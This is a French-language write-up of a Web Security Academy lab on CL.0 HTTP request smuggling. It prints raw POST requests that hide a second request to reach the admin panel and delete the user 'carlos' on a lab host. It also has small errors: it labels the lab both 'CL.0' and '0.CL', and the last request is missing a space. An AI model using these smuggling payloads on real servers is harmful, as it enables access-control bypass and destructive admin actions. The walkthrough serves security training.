Smuggling via CL.0

0.CL request smuggling

Lab: 0.CL request smuggling | Web Security AcademyWebSecAcademy

Résumé du laboratoire

Dans ce scénario, on exploite une vulnérabilité de type CL.0, où le serveur back-end ignore l’en-tête Content-Length pour certains chemins. Cette incohérence permet d’injecter une seconde requête dans le corps d’une requête POST apparemment normale.

Identification de l’endpoint vulnérable

Après quelques tests, on constate que l’URL :

/resources/images/blog.svg

est traitée différemment par le back-end : même si Content-Length est défini à zéro, le serveur récupère tout le contenu fourni, ce qui crée une fenêtre parfaite pour un smuggling basé sur CL.0.

Injection d’une requête cachée

On envoie d’abord une requête POST minimale pour confirmer le comportement :

POST /resources/images/blog.svg HTTP/1.1

Host: 0a4f004a03a25bdd80191c85004500ba.web-security-academy.net

Content-Length: 0

Ensuite, on profite du fait que le back-end lit malgré tout le contenu pour lui smuggler une deuxième requête, ici destinée à atteindre le panneau d’administration :

POST /resources/images/blog.svg HTTP/1.1

Host: 0a4f004a03a25bdd80191c85004500ba.web-security-academy.net

Content-Length: 26





GET /admin HTTP/1.1

Test: A

Le back-end interprète la partie injectée comme une requête indépendante et nous permet de contourner les restrictions du front-end.

Suppression de l’utilisateur carlos

Une fois l’accès au panneau d’administration confirmé, on injecte une requête similaire pour déclencher l’action :

/admin/delete?username=carlos

Ce qui donne :

POST /resources/images/blog.svg HTTP/1.1
Host: 0a4f004a03a25bdd80191c85004500ba.web-security-academy.net
Content-Length: 26


GET /admin/delete?username=carlosHTTP/1.1
Test: A

Mis à jour il y a 15 jours

Ce contenu vous a-t-il été utile ?